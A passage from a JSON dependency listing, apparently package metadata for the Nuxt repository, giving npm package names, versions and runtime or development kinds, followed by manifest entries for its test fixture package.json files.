.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353261,"package_name":"siginfo@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353262,"package_name":"signal-exit@3.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353263,"package_name":"signal-exit@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353264,"package_name":"sirv@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353265,"package_name":"slash@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353266,"package_name":"slash@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353267,"package_name":"slugify@1.6.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353268,"package_name":"smob@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353269,"package_name":"snake-case@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353270,"package_name":"socket.io-client@4.7.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353271,"package_name":"socket.io-parser@4.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353272,"package_name":"source-list-map@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353273,"package_name":"source-map-js@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353274,"package_name":"source-map-support@0.5.21","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353275,"package_name":"source-map@0.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353276,"package_name":"source-map@0.7.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353277,"package_name":"space-separated-tokens@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353278,"package_name":"spdx-correct@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353279,"package_name":"spdx-exceptions@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353280,"package_name":"spdx-expression-parse@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353281,"package_name":"spdx-license-ids@3.0.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353282,"package_name":"sprintf-js@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353283,"package_name":"stack-utils@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353284,"package_name":"stackback@0.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353285,"package_name":"stackframe@1.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353286,"package_name":"standard-as-callback@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353287,"package_name":"statuses@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353288,"package_name":"std-env@3.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353289,"package_name":"streamsearch@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353290,"package_name":"streamx@2.15.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353291,"package_name":"string-width@4.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353292,"package_name":"string-width@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353293,"package_name":"string.prototype.trim@1.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353294,"package_name":"string.prototype.trimend@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353295,"package_name":"string.prototype.trimstart@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353296,"package_name":"string_decoder@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353297,"package_name":"string_decoder@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353298,"package_name":"stringify-entities@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353299,"package_name":"strip-ansi@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353300,"package_name":"strip-ansi@7.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353301,"package_name":"strip-bom@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353302,"package_name":"strip-final-newline@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353303,"package_name":"strip-final-newline@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353304,"package_name":"strip-indent@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353305,"package_name":"strip-json-comments@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353306,"package_name":"strip-literal@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353307,"package_name":"style-dictionary-esm@1.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353308,"package_name":"stylehacks@6.0.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353309,"package_name":"supports-color@5.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353310,"package_name":"supports-color@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353311,"package_name":"supports-color@8.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353312,"package_name":"supports-color@9.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353313,"package_name":"supports-preserve-symlinks-flag@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353314,"package_name":"svg-tags@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353315,"package_name":"svgo@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353316,"package_name":"tabbable@6.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353317,"package_name":"tapable@1.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353318,"package_name":"tapable@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353319,"package_name":"tar-stream@3.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353320,"package_name":"tar@6.1.15","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353322,"package_name":"terser-webpack-plugin@5.3.9(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353325,"package_name":"terser@5.19.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353327,"package_name":"test-exclude@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353330,"package_name":"text-table@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353332,"package_name":"thingies@1.12.0(tslib@2.6.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353787,"package_name":"time-fix-plugin@2.0.7(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353788,"package_name":"tiny-invariant@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353789,"package_name":"tinybench@2.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353790,"package_name":"tinycolor2@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353791,"package_name":"tinypool@0.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353792,"package_name":"tinyspy@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353793,"package_name":"titleize@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353794,"package_name":"tmpl@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353795,"package_name":"to-fast-properties@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353796,"package_name":"to-regex-range@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353797,"package_name":"toidentifier@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353798,"package_name":"token-stream@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353799,"package_name":"totalist@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353800,"package_name":"tr46@0.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353801,"package_name":"trim-lines@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353802,"package_name":"trough@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353803,"package_name":"ts-api-utils@1.0.2(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353804,"package_name":"tsconfig-paths@3.14.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353805,"package_name":"tslib@2.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353806,"package_name":"type-check@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353807,"package_name":"type-detect@4.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353808,"package_name":"type-fest@0.20.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353809,"package_name":"type-fest@0.21.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353810,"package_name":"type-fest@0.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353811,"package_name":"type-fest@0.8.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353812,"package_name":"type-fest@3.13.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353813,"package_name":"typed-array-buffer@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353814,"package_name":"typed-array-byte-length@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353815,"package_name":"typed-array-byte-offset@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353816,"package_name":"typed-array-length@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353817,"package_name":"typesafe-path@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353818,"package_name":"typescript@5.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353819,"package_name":"uc.micro@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353820,"package_name":"ufo@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353821,"package_name":"ultrahtml@1.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353822,"package_name":"unbox-primitive@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353823,"package_name":"unbuild@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353824,"package_name":"unbuild@2.0.0(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353825,"package_name":"uncrypto@0.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353826,"package_name":"unctx@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353827,"package_name":"undici@5.23.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353828,"package_name":"unenv@1.7.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353829,"package_name":"unhead@1.7.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353830,"package_name":"unified@10.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353831,"package_name":"unimport@3.3.0(rollup@3.29.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353832,"package_name":"unist-builder@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353833,"package_name":"unist-util-generated@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353834,"package_name":"unist-util-is@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353835,"package_name":"unist-util-is@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353836,"package_name":"unist-util-position@4.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353837,"package_name":"unist-util-position@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353838,"package_name":"unist-util-stringify-position@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353839,"package_name":"unist-util-stringify-position@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353840,"package_name":"unist-util-visit-parents@5.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353841,"package_name":"unist-util-visit-parents@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353842,"package_name":"unist-util-visit@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353843,"package_name":"unist-util-visit@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353844,"package_name":"universalify@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353845,"package_name":"unplugin-vue-router@0.6.4(rollup@3.29.1)(vue-router@4.2.4)(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353846,"package_name":"unplugin@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353847,"package_name":"unstorage@1.9.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353848,"package_name":"untildify@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353849,"package_name":"untun@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353850,"package_name":"untyped@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353851,"package_name":"update-browserslist-db@1.0.11(browserslist@4.21.10)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353852,"package_name":"upper-case-first@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353853,"package_name":"upper-case@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353854,"package_name":"uqr@0.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353855,"package_name":"uri-js@4.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353856,"package_name":"url-loader@4.1.1(file-loader@6.2.0)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353857,"package_name":"urlpattern-polyfill@8.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353858,"package_name":"util-deprecate@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353859,"package_name":"util@0.12.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353860,"package_name":"uvu@0.5.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353861,"package_name":"validate-npm-package-license@3.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353862,"package_name":"vfile-location@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353863,"package_name":"vfile-message@3.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353864,"package_name":"vfile@5.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353865,"package_name":"vite-node@0.33.0(@types","ecosystem":"npm","requirements":"node@18.17.18)","direct":false,"kind":"runtime","optional":false},{"id":13870353866,"package_name":"vite-plugin-checker@0.6.2(eslint@8.49.0)(typescript@5.2.2)(vite@4.4.9)(vue-tsc@1.8.13)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353867,"package_name":"vite@4.4.9(@types","ecosystem":"npm","requirements":"node@18.17.18)","direct":false,"kind":"runtime","optional":false},{"id":13870353868,"package_name":"vitest-environment-nuxt@0.10.5(happy-dom@12.1.5)(vitest@0.33.0)(vue-router@4.2.4)(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353869,"package_name":"vitest@0.33.0(happy-dom@12.1.5)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353870,"package_name":"void-elements@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353871,"package_name":"vscode-jsonrpc@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353872,"package_name":"vscode-languageclient@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353873,"package_name":"vscode-languageserver-protocol@3.16.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353874,"package_name":"vscode-languageserver-textdocument@1.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353875,"package_name":"vscode-languageserver-types@3.16.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353876,"package_name":"vscode-languageserver@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353877,"package_name":"vscode-uri@3.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353878,"package_name":"vue-bundle-renderer@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353879,"package_name":"vue-component-meta@1.8.8(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353880,"package_name":"vue-component-type-helpers@1.8.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353881,"package_name":"vue-component-type-helpers@1.8.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353882,"package_name":"vue-demi@0.14.5(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353883,"package_name":"vue-devtools-stub@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353884,"package_name":"vue-eslint-parser@9.3.1(eslint@8.49.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353885,"package_name":"vue-loader@17.2.2(vue@3.3.4)(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353886,"package_name":"vue-router@4.2.4(vue@3.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353887,"package_name":"vue-template-compiler@2.7.14","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353888,"package_name":"vue-tsc@1.8.13(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353889,"package_name":"vue@3.3.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353890,"package_name":"walker@1.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353891,"package_name":"watchpack@2.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353892,"package_name":"web-namespaces@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353893,"package_name":"web-streams-polyfill@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353894,"package_name":"webidl-conversions@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353895,"package_name":"webidl-conversions@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353896,"package_name":"webpack-bundle-analyzer@4.9.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353897,"package_name":"webpack-dev-middleware@6.1.1(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353898,"package_name":"webpack-hot-middleware@2.25.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353899,"package_name":"webpack-sources@1.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353900,"package_name":"webpack-sources@3.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353901,"package_name":"webpack-virtual-modules@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353902,"package_name":"webpack@5.88.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353903,"package_name":"webpackbar@5.0.2(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353904,"package_name":"whatwg-encoding@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353905,"package_name":"whatwg-mimetype@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353906,"package_name":"whatwg-url@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353907,"package_name":"which-boxed-primitive@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353908,"package_name":"which-typed-array@1.1.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353909,"package_name":"which@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353910,"package_name":"why-is-node-running@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353911,"package_name":"wide-align@1.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353912,"package_name":"with@7.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353913,"package_name":"wrap-ansi@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353914,"package_name":"wrap-ansi@8.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353915,"package_name":"wrappy@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353916,"package_name":"write-file-atomic@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353917,"package_name":"ws@7.5.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353918,"package_name":"ws@8.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353919,"package_name":"ws@8.13.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353920,"package_name":"xml-name-validator@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353921,"package_name":"xmlhttprequest-ssl@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353922,"package_name":"xxhashjs@0.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353923,"package_name":"y18n@5.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353924,"package_name":"yallist@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353925,"package_name":"yallist@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353926,"package_name":"yaml@1.10.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353927,"package_name":"yaml@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353928,"package_name":"yargs-parser@21.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353929,"package_name":"yargs@17.7.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353930,"package_name":"yocto-queue@0.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353931,"package_name":"yocto-queue@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870353932,"package_name":"zhead@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353933,"package_name":"zip-stream@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870353934,"package_name":"zwitch@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/basic/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:11.679Z","updated_at":"2023-09-22T09:09:11.679Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/basic/package.json","dependencies":[{"id":13870354411,"package_name":"@nuxt/webpack-builder","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870354412,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870354413,"package_name":"ufo","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870354414,"package_name":"unplugin","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870354415,"package_name":"vue","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/basic-types/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:14.777Z","updated_at":"2023-09-22T09:09:14.777Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/basic-types/package.json","dependencies":[{"id":13870354449,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870354450,"package_name":"ofetch","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870354451,"package_name":"vitest","ecosystem":"npm","requirements":"0.33.0","direct":true,"kind":"development","optional":false},{"id":13870354452,"package_name":"vue-router","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false},{"id":13870354453,"package_name":"vue","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/minimal/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:15.264Z","updated_at":"2023-09-22T09:09:15.264Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/minimal/package.json","dependencies":[{"id":13870354497,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870354498,"package_name":"vue","ecosystem":"npm","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/minimal-types/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:15.742Z","updated_at":"2023-09-22T09:09:15.742Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/minimal-types/package.json","dependencies":[{"